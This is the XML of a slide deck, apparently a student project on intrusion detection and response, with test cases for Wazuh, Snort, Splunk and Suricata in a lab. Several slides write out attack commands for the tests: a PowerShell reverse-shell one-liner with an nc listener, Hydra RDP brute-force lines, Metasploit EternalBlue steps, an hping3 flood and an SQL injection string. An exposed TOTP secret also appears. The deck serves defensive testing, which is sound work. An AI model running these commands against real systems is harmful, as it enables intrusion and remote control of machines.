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Inter SemiBold"/>
      <p:regular r:id="rId71"/>
      <p:bold r:id="rId72"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inter Light"/>
      <p:regular r:id="rId73"/>
      <p:bold r:id="rId74"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inter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0FAE2F-B24F-49A5-A5C1-D7289E50AAE5}">
  <a:tblStyle styleId="{4C0FAE2F-B24F-49A5-A5C1-D7289E50AA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InterLight-regular.fntdata"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/InterSemiBold-bold.fntdata"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inter-regular.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/InterLight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Inter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InterSemiBold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4320969f5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4320969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3f38e9b9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3f38e9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03f38e9b9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03f38e9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3f38e9b9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03f38e9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3f38e9b9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03f38e9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03f38e9b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03f38e9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3f38e9b9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3f38e9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03f38e9b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03f38e9b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3f38e9b9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3f38e9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03f38e9b9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03f38e9b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3f38e9b9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03f38e9b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4320969f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432096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03f38e9b9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03f38e9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03f38e9b9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03f38e9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03f38e9b9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03f38e9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03f38e9b9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03f38e9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03f38e9b9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03f38e9b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03f38e9b9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03f38e9b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03f38e9b9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03f38e9b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03f38e9b9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03f38e9b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03f38e9b9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03f38e9b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73b4cb7d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73b4cb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a8820a2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a8820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616c8bf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616c8b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68e48bdd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68e48b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616c8bfd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616c8bf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68e48bdd0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68e48bd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616c8bfd6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616c8bf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68e48bdd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68e48bdd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616c8bfd6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616c8bf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68e48bdd0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68e48bdd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616c8bfd6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616c8bf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616c8bfd6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616c8bf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03f38e9b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03f38e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616c8bfd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616c8bf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616c8bfd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616c8bf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68e48bdd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68e48bd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68e48bdd0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68e48bd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616c8bfd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616c8bf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68e48bdd0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68e48bd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03f38e9b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03f38e9b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097c3c7a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097c3c7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6038c861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6038c861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6475b65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6475b6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03f38e9b9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03f38e9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6038c8611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06038c86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6475b65b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6475b65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6038c8611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6038c861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6475b65b0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6475b65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6475b65b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6475b65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6475b65b0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6475b65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6475b65b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6475b65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6038c8611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6038c861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6038c8611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6038c861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6475b65b0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06475b65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3f38e9b9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03f38e9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6038c8611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06038c861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6038c8611_1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06038c861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6038c8611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6038c861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6475b65b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06475b65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06475b65b0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06475b65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06475b65b0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06475b65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3f38e9b9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3f38e9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03f38e9b9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03f38e9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3f38e9b9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3f38e9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0NYz_SzPe980MFp5TOTKLTP52_FAnbZd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lySDK4t0wLnwngqz2SIx73-sKhl9Ooa8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keuccAmmEqWp2qHSCASnkJQ5NSMIgsyz/view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H25t9o9rdBTV3xUF46svLOOMixEQglDo/view" TargetMode="External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-inm1pVB9mqDXm9oBTVzGIpftVF1YIUp/view" TargetMode="External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oWjp7pH_3-WV5nhDfMTAbj7L5ToDU_3X/view" TargetMode="External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Xa9DNcX6WcSuIpsH8YYppiOUmWUCEu1v/view" TargetMode="External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iUjm-MV0618TEd-GBy6UpmodcfYo2wdu/view" TargetMode="External"/><Relationship Id="rId4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To7HCyKFVlQFEjQ2LZyrvgnzrsGLMErt/view" TargetMode="External"/><Relationship Id="rId4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ll7o7PhjEkxZzwuLpXrHbml1eVruLcbY/view" TargetMode="External"/><Relationship Id="rId4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rWSjbTSkejXHHm3DEMAQXshBQU9odovi/view" TargetMode="External"/><Relationship Id="rId4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3HiM1oJ1GmGtRP4neKZtv1GPlWo7AeZb/view" TargetMode="External"/><Relationship Id="rId4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tanjared6@gmail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rive.google.com/file/d/192qJXar6wEBZ88DU7BedKo1YorZuawSC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drive.google.com/file/d/1w0PpaGGhJmYIpz5F67eRb8nFDVxXwAQi/view" TargetMode="External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rive.google.com/file/d/1KV_KFImAmtsi9xEhp8k-_dBx8P2-8kKV/view" TargetMode="External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rive.google.com/file/d/1pxSm56Q4visUSOEjcNQESL3TtOjXpVWp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yG7cG7GtokMRfFeXYNRgE29vikOcGhy/view" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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rive.google.com/file/d/1V8q5gmdaqJStZPUL2DP3zo88-2zlQDAm/view" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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rive.google.com/file/d/13zPb3zMlx5l_N5dlbhbuhrIIAR0bw8HM/view" TargetMode="External"/><Relationship Id="rId4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testmynids.org/uid/index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drive.google.com/file/d/1V8q5gmdaqJStZPUL2DP3zo88-2zlQDAm/view" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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drive.google.com/file/d/1T3B0IDTYlU6RPNMyfMddOQyizbSz6N82/view" TargetMode="External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drive.google.com/file/d/18oJ1NIhSDRtjrplHUL-0hSQusyh9vm47/view" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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drive.google.com/file/d/1bhdcjCMFynFIcUBrLctWQs976VD4iCgD/view" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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drive.google.com/file/d/1sW5pLuAFNZb8UU00XDNEYPN6EDoF5NSE/view" TargetMode="External"/><Relationship Id="rId4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yUbSuMu_--SFBFRNwa08Ggq2cvyKOU9/view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3mMeZNTq0ZPBdIN3JTswAfNK1LaIxDhQ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50" y="1075050"/>
            <a:ext cx="7068300" cy="323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(Week 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6359650" y="4072625"/>
            <a:ext cx="2649600" cy="9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Presented By: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Dennis Ng Han Jie (204461H)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Joseph Poon (200790F)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Tan Nguet Sen Jared (200463Z)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41875" y="234775"/>
            <a:ext cx="8664900" cy="5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4: Automatic blocking of IP address after multiple failed logins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command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sudo hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt &lt;IP Address of agent&gt; rdp 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a Kali virtual machine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Firewall to view firewall rule added to block the attacker IP address created by custom firewall.exe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the creation of the firewall rule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notifying firewall rule creation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 firewall is created on the agent to block the attacker’s IP address by the custom firewall.exe. Alerts are generated as well by Wazuh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 firewall is created on the agent to block the attacker’s IP address by the custom firewall.exe. Alerts are generated as well by Wazuh and an email alert was sent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.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https://1drv.ms/u/s!AubF3kOr_pwxgP400rTW3lcWomUjZg?e=wwp2Nf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2" title="Test Case 5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1875" y="234775"/>
            <a:ext cx="86649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5: Automatic unblocking of IP address after 5 minutes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command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sudo hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt &lt;IP Address of agent&gt; rdp on a Kali virtual machine (If IP is not blocked yet)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Firewall to view firewall rule added to block the attacker IP address created by custom firewall.exe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Wait 5 minutes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Refresh Firewall rules view that the earlier created firewall rule was deleted by custom firewall.exe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the deletion of the firewall rule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notifying firewall rule deletion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 and an email alert was sent..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241875" y="247325"/>
            <a:ext cx="8664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5: Automatic unblocking of IP address after 5 minutes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https://1drv.ms/u/s!AubF3kOr_pwxgP44Svj1U21IA0S1qw?e=APlSS8</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="24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0" name="Google Shape;130;p24" title="Test Case 6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975" y="1562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241875" y="247325"/>
            <a:ext cx="86649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6: Detection of processes created on the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any .exe program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that a process was created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https://1drv.ms/u/s!AubF3kOr_pwxgP4zlANhlsxIUXFZzA?e=dLm5sg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6" title="Test Case 7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241875" y="240250"/>
            <a:ext cx="86649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7: Automatic killing of malicious processes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self-created ransomware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that process was creating files that may be used by malware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Ransomware process is killed by custom killprocess.exe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that process was killed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notifying the creation of malicious files and that the malicious process was killed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firewall rule that was created to block the attacker was deleted after 5 minutes by the custom firewall.exe. Alerts are generated as well by Wazuh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https://1drv.ms/u/s!AubF3kOr_pwxgP4239Z1IINdIk3ASw?e=2r8AoJ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8" title="Test Case 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41875" y="233200"/>
            <a:ext cx="8664900" cy="4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8: Backup Wazuh Server configurations using backup script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backup.py on Wazuh Server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Enter option 1 to backup files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Click on the link outputted for authorisation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Login using an authorised account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Enter option 1 again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Check Google Drive to view archive zip file created after “Backup created” is displayed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Backup archive file of all Wazuh server files created in the Google Drive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Backup archive file of all Wazuh server files created in the Google Drive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https://1drv.ms/u/s!AubF3kOr_pwxgP41w18esMtEEaN76A?e=lwEjqO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0" title="Test Case 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108014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5000" y="1371150"/>
            <a:ext cx="911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Dennis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Test Cases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241875" y="240250"/>
            <a:ext cx="8664900" cy="4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9: Recovery of Wazuh Server configurations using backup script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Delete a line from any of the configuration files on the Wazuh server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backup.py on Wazuh Server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Enter option 2 to recover files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Click on the link outputted for authorisation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Login using an authorised account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Enter option 2 again (if needed)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Choose an archive to recover from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Check if configurations have been restored on Wazuh after “Wazuh Services started” is displayed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Deleted configuration is recovered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Deleted configuration is recovered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https://1drv.ms/u/s!AubF3kOr_pwxgP43YBsvxLB0H-Aj8A?e=T1UlbL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32" title="Test Case 1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241875" y="240250"/>
            <a:ext cx="86649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10: Detection of network connections on the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a terminal in your attacker machine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 </a:t>
            </a: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nc -lvp 4444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Ensure Real-time protection is disabled on the agent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Powershell on the agent and run the command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$client = New-Object System.Net.Sockets.TCPClient("192.168.71.139",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "&gt; ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()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network connection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notifying network connection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Attacker managed to gain a reverse shell on the agent. Alert generated by Wazuh showing network connection created and email alert sent to notify Administrator.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241875" y="240250"/>
            <a:ext cx="8664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10: Detection of network connections on the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Attacker managed to gain a reverse shell on the agent. Alert generated by Wazuh showing network connection created and email alert sent to notify Administrator.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https://1drv.ms/u/s!AubF3kOr_pwxgP48e1-EQ-UcJnsg8g?e=vyspG9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1" name="Google Shape;191;p34" title="Test Case 1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75" y="1830800"/>
            <a:ext cx="4918488" cy="27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241875" y="240250"/>
            <a:ext cx="86649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11: Block network connection on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a terminal in your attacker machine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 </a:t>
            </a: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nc -lvp 4444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Ensure Real-time protection is disabled on the agent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Powershell on the agent and run the command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$client = New-Object System.Net.Sockets.TCPClient("192.168.71.139",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "&gt; ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()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Firewall rule created by custom blockshell.exe to block attacker IP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on creation of firewall rule and network connection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to notify creation of firewall rule and network connection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241875" y="240250"/>
            <a:ext cx="86649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11: Block network connection on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Attacker is unable to gain a reverse shell on the agent. Alert generated by Wazuh showing firewall rule creation and network connection created and email alert sent to notify Administrator.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: Attacker is unable to gain a reverse shell on the agent. Alert generated by Wazuh showing firewall rule creation and network connection created and email alert sent to notify Administrator.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https://1drv.ms/u/s!AubF3kOr_pwxgP473REG7rLIhpAwTQ?e=zcxByX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4" name="Google Shape;204;p36" title="Test Case 12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750" y="3020900"/>
            <a:ext cx="3502488" cy="19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241875" y="240250"/>
            <a:ext cx="86649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12: Whitelist network connection on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a terminal in your attacker machine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</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="15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nc -lvp 4444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Ensure Real-time protection is disabled on the agent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Add IP address to be whitelisted to whitelist.txt located in C:/Program Files (x86)/ossec-agent/active-response/bin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Open Powershell on the agent and run the command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$client = New-Object System.Net.Sockets.TCPClient("192.168.71.139",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "&gt; ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()</a:t>
            </a:r>
            <a:endParaRPr i="1"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Firewall rules to ensure no rule was created to block the IP address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active-response.log to view logs generated by the custom blockshell.exe notifying that it is whitelisted, and will exit the program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241875" y="240250"/>
            <a:ext cx="8664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12: Whitelist network connection on agent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Whitelisted IP address will still be able to connect to the agent.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Whitelisted IP address will still be able to connect to the agent.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https://1drv.ms/u/s!AubF3kOr_pwxgP4628M1lJR4cmWtUA?e=hQAbcm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38" title="Test Case 1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813" y="1958600"/>
            <a:ext cx="5391024" cy="30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108014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15000" y="1371150"/>
            <a:ext cx="911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Jared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Test Cases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" name="Google Shape;228;p40"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1231125" y="-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{4C0FAE2F-B24F-49A5-A5C1-D7289E50AAE5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="473250"/>
                <a:gridCol w="5298500"/>
                <a:gridCol w="9099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No.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Test Case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Result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EternalBlue Detection - pfsense (Snort)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Eternalblue Response - Splunk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Reducing Attack surface with OpenVPN + TOTP - pfsense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RDP Brute Force Detection - Splunk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Availability - pfsense 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Restrict Admin access - PfSense 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Backup and Restore - PfSense(Best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Rules Management - pfsense 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Pfsense logs are automatically backup - Splunk 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1231125" y="-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{4C0FAE2F-B24F-49A5-A5C1-D7289E50AAE5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="473250"/>
                <a:gridCol w="5298500"/>
                <a:gridCol w="9099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No.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Test Case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Result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malicious files with FIM and VirusTotal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removal of malicious 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brute force attempts over the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blocking of IP address after multiple failed logins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unblocking of IP address after 5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processes created on the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killing of malicious processes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Backup Wazuh Server configurations using backup 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Recovery of Wazuh Server configurations using backup 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network connections on the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network connection on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Whitelist network connection on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241875" y="234775"/>
            <a:ext cx="86721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EternalBlue Detection - pfsense (Snort)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	Set up Eternalblue exploit on kali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1.1) msfconsole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1.2) search ms17-010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1.3) use 0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1.4) set RHOSTS 172.16.1.145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1.5) Exploit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 	Alert Generated by snort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	Attacker machine is added to the block lists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 	Exploit is complete, but no session was created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Attack is unsuccessful, detected with alert under pfsenses Snort, and attacker IP is added to Snort Block Lists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Attack is unsuccessful, detected with alert under pfsenses Snort, and attacker IP is added to Snort Block Lists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https://1drv.ms/u/s!AubF3kOr_pwxgP43YBsvxLB0H-Aj8A?e=T1UlbL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241875" y="234775"/>
            <a:ext cx="867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1: EternalBlue Detection - pfsense (Snort) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i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cont</a:t>
            </a:r>
            <a:endParaRPr i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1" name="Google Shape;241;p42" title="Snort_Custom_Rul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218475"/>
            <a:ext cx="6706890" cy="3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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241875" y="234775"/>
            <a:ext cx="8672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2: Eternalblue Response - Splunk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 	Set up Eternalblue exploit on kali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1.1) msfconsole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1.2) search ms17-010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1.3) use 0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1.4) set RHOSTS 172.16.1.145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1.5) Exploit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 Alert Generated by snort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	Attacker machine is added to the block lists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 	Exploit is complete, but no session was created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5) 	Splunk Alerts are triggered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6) 	Email is send to the tanjared6@gmail.com(administrator)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Splunk alert was triggered, and responded by sending an email to tanjared6@gmail.com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Splunk alert was triggered, and responded by sending an email to tanjared6@gmail.com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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241875" y="234775"/>
            <a:ext cx="86721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2: Eternalblue Response - Splunk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4" name="Google Shape;254;p44" title="Splunk_Dete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25" y="1249450"/>
            <a:ext cx="6651850" cy="37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45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241875" y="234775"/>
            <a:ext cx="8672100" cy="6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3: Reducing Attack surface with OpenVPN + TOTP - pfsense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 	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Ping 172.16.1.32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 	Unable to Ping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	Connect to OpenVPN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3.1)	sudo openvpn connection.ovpn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3.2) 	google=$(oathtool --base32 --totp "2SG4PUO3XHX33TSY" -d | echo ${google}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3.3)	Type in tom as username and pin + TOTP as password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	Ping 172.16.1.32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Connection is successful and able to ping other hosts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Connection is successful and able to ping other hosts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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241875" y="234775"/>
            <a:ext cx="86721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3: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Reducing Attack surface with OpenVPN + TOTP - pfsense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7" name="Google Shape;267;p46" title="OVPN+TOT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278275"/>
            <a:ext cx="6600576" cy="37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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241875" y="234775"/>
            <a:ext cx="8672100" cy="4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4: RDP Brute Force Detection - Splunk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	Ping 172.16.1.32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 	Unable to Ping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	Connect to OpenVPN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3.1)	sudo openvpn connection.ovpn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3.2) 	google=$(oathtool --base32 --totp "2SG4PUO3XHX33TSY" -d | echo ${google}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3.3)	Type in tom as username and pin + TOTP as password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	Ping 172.16.1.32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	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5)	Run RDP brute force command on attacker machine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5.1) 	hydra -L /usr/share/wordlists/rockyou.txt -U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/usr/share/wordlists/rockyou.txt rdp://192.168.1.100 -V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6)	Splunk detects that a rdp brute force is ongoing and triggers alert and send an email to </a:t>
            </a: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tanjared6@gmail.com</a:t>
            </a:r>
            <a:endParaRPr sz="19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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241875" y="234775"/>
            <a:ext cx="8672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4: RDP Brute Force Detection - Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr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cont</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="19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Splunk alert was triggered, and responded by sending an email to tanjared6@gmail.com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Splunk alert was triggered, and responded by sending an email to tanjared6@gmail.com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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241875" y="234775"/>
            <a:ext cx="86721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5: High Availability - pfsense (Best Practice)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	Transition during failover of MASTER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1.1) 	Show that Status is MASTER for 172.16.1.1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1.2) 	Show that Status is BACKUP for 172.16.1.10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1.3)	Kali ping host 1.1.1.1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1.4) 	Shutdown Master pfsense 172.16.1.1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1.5) 	Show that kali is still pinging, Stop kali ping, Show that Kali packet loss is not high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1.6) 	Show that BACKUP 172.16.1.10 becomes MASTER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	Transition during recovery of MASTER 	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2.1)	Kali ping host 1.1.1.1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2.2) 	Turn on Master pfsense 172.16.1.1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2.3) 	Show that MASTER 172.16.1.1 Control is regained, Show that MASTER 172.16.1.10 returns to BACKUP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2.4) 	Show Kali is still pinging, Stop Kali ping, Show that Kali packet loss is not high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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241875" y="234775"/>
            <a:ext cx="86721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5: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High Availability - pfsense (Best Practice)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Cont</a:t>
            </a:r>
            <a:endParaRPr i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Seamless on the failover and recovery of MASTER pfsense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Seamless on the failover and recovery of MASTER pfsense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2" name="Google Shape;292;p50" title="pfsenseH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1945375"/>
            <a:ext cx="5743325" cy="3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41875" y="234775"/>
            <a:ext cx="86721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1: Detection of malicious files with FIM and VirusTotal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Download a malicious file from a Virus Database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that was generated in Wazuh VirusTotal showing that it is malicious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to Administrator notifying malicious file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An alert is generated by Wazuh whenever a malicious file was added to the agent, and an email alert is sent as well.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 An alert is generated by Wazuh whenever a malicious file was added to the agent, and an email alert is sent as well.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https://1drv.ms/u/s!AubF3kOr_pwxgP4xne82ZCSh5Yaz2w?e=wbZbFJ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51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241875" y="234775"/>
            <a:ext cx="86721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6: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Restrict Admin access - PfSense (Best practice)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	Access pfSense Web GUI with a hosts that is within the defined host list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	Able to access and navigate around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	Access pfSense Web GUI with a hosts that is NOT within the defined host list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	Unable to access and navigate around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pfsense can only be access through the Web Gui with a host within the defined host list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pfsense can only be access through the Web Gui with a host within the defined host list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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241875" y="234775"/>
            <a:ext cx="86721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7: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Backup and Restore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- PfSense(Best practice)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	Download pfSense configuration as XML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	Alter pfSense configuration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2.1) 	Delete LAN2 Interface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2.2) 	Delete Snort Custom Rule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4)	Restore the configuration using the XML file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5) 	Show restored pfSense configuration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5.1) 	Show LAN2 interface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5.2) 	Show Snort Custom Rule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Altered Configuration successfully restored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Altered Configuration successfully restored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53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241875" y="234775"/>
            <a:ext cx="86721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7: Backup and Restore - PfSense(Best practice)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i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cont</a:t>
            </a:r>
            <a:endParaRPr i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1" name="Google Shape;311;p53" title="Backup&amp;Restoremp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932925"/>
            <a:ext cx="7019626" cy="40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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241875" y="234775"/>
            <a:ext cx="86721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8: Rules Management - pfsense (best practice)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 	Show rules are using white listing methodology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	Show rules are from most detailed to less detailed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	Show Operations are not affected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3.1)	Windows and Ubuntu is able to surf the internet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Rules are managed appropriately and do not affect operation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Rules are managed appropriately and do not affect operation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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241875" y="234775"/>
            <a:ext cx="86721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9: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Pfsense logs are automatically backup - Splunk (Best Practice)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1) 	Delete logs from pfsense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2) 	Show Splunk logs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Logs are still stored in splunk after logs are deleted from pfsense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Logs are still stored in splunk after logs are deleted from pfsense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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241875" y="234775"/>
            <a:ext cx="86721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9: Pfsense logs are automatically backup - Splunk (Best Practice) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i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cont</a:t>
            </a:r>
            <a:endParaRPr i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0" name="Google Shape;330;p56" title="pfsenselog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702" y="1072175"/>
            <a:ext cx="6602575" cy="3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10801400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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15000" y="1371150"/>
            <a:ext cx="911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Joseph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Test Cases</a:t>
            </a:r>
            <a:endParaRPr sz="72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1" name="Google Shape;341;p58"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1231125" y="-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{4C0FAE2F-B24F-49A5-A5C1-D7289E50AAE5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="473250"/>
                <a:gridCol w="5298500"/>
                <a:gridCol w="9099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No.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Test Case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FAFA"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Result</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FAFAFA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Suricata DoS Attack &amp; Prevention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Suricata Dry Run (Best Practice)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Injection Detection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 Malicious Outbound Traffic (via Browser)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 Malicious Outbound Traffic (via CLI)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Duplicati Local Backup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Duplicati Google Drive Backup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Duplicati Disaster Recovery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 Directory Kerberoasting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1: Suricata DoS Attack &amp; Prevention</a:t>
            </a:r>
            <a:endParaRPr sz="2000"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Suricata on Victim.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05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'C:\Program Files\Suricata\'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 .\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="105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suricata.exe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-c .\suricata.yaml --windivert true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`hping3` to simulate DOS attack on Kali (Attacker Machine).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sudo hping3 -c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-d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-S -w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-p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--flood --rand-source 192.168.159.136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alert in Suricata.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05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'C:\Program Files\Suricata\'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 cat .\log\fast.log -tail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-wait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DoS packets are dropped &amp; logged to Suricata fast.log.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DoS packets are dropped &amp; logged to Suricata fast.log.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348" name="Google Shape;348;p5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1: Suricata DoS Attack &amp; Prevention</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="Google Shape;354;p6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60" title="Suricata DoS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11" y="1353950"/>
            <a:ext cx="6465978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 title="Test Case 2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2: Suricata Dry Run (Best Practice)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Google Shape;361;p6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Validate current Suricata configuration via a dry run.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.\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="105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suricata.exe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-T -c .\suricata.yaml -v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Verify that output has no errors.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Dry run has no errors which signifies no syntax error for config files.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Dry run has no errors which signifies no syntax error for config files.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362" name="Google Shape;362;p6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2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Suricata Dry Run (Best Practice)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Google Shape;368;p6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62" title="Suricata Dry Ru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5" y="1353950"/>
            <a:ext cx="6465952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3: SQL Injection Detection</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Google Shape;375;p63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Launch XAMPP on Victim Machine to start DVWA &amp; start Apache &amp; MySQL.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C:\xampp\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="105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xampp-control.exe</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="0184BC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Navigate to `&lt;victim_IP&gt;/dvwa/setup.php` on Kali.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 &amp; attempt SQL injection.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'or 1==1;--</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="50A14F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alert on Suricata.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SQL Injection is detected &amp; logged. SQL Injection attempts are unsuccessful.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SQL Injection is detected &amp; logged. SQL Injection attempts are unsuccessful.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376" name="Google Shape;376;p6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3: SQL Injection Detection</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="Google Shape;382;p6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64" title="Suricata SQLi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14" y="1353950"/>
            <a:ext cx="6465962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4: Detect Malicious Outbound Traffic (via Browser)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"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 to simulated malicious website on browser.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 u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink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http://testmynids.org/uid/index.html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Verify that Suricata drops the request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Suricata detects outbound traffic to malicious websites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Suricata detects outbound traffic to malicious websites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390" name="Google Shape;390;p6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5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Detect Malicious Outbound Traffic (via CLI)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Google Shape;396;p66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Curl content from simulated malicious website via command line.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curl http://testmynids.org/uid/index.html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Verify that Suricata drops the request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Suricata detects outbound traffic to malicious websites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Suricata detects outbound traffic to malicious websites &amp; sends an alert.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397" name="Google Shape;397;p6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4 &amp; 5</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="Google Shape;403;p6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67" title="Suricata Dry Ru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2" y="1353950"/>
            <a:ext cx="6465952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backup.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Backup to `backup` folder.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 sz="1400"/>
              <a:t>Best Practice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>: Backup only `C:\Users` &amp; `C:\ProgramData`, where ProgramData stores configuration.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Backup configuration files by running Duplicati in elevated mode &amp; enabling `--snapshot-policy` &amp; VSS (Volume Shadow-Copy Service) in Windows.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This enables restoration while files are in use.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Manually run or schedule-based.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Delete local files.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Restore from local backup.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Verify that files have been restored.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="Google Shape;410;p6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6: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Duplicati Local Backup</a:t>
            </a:r>
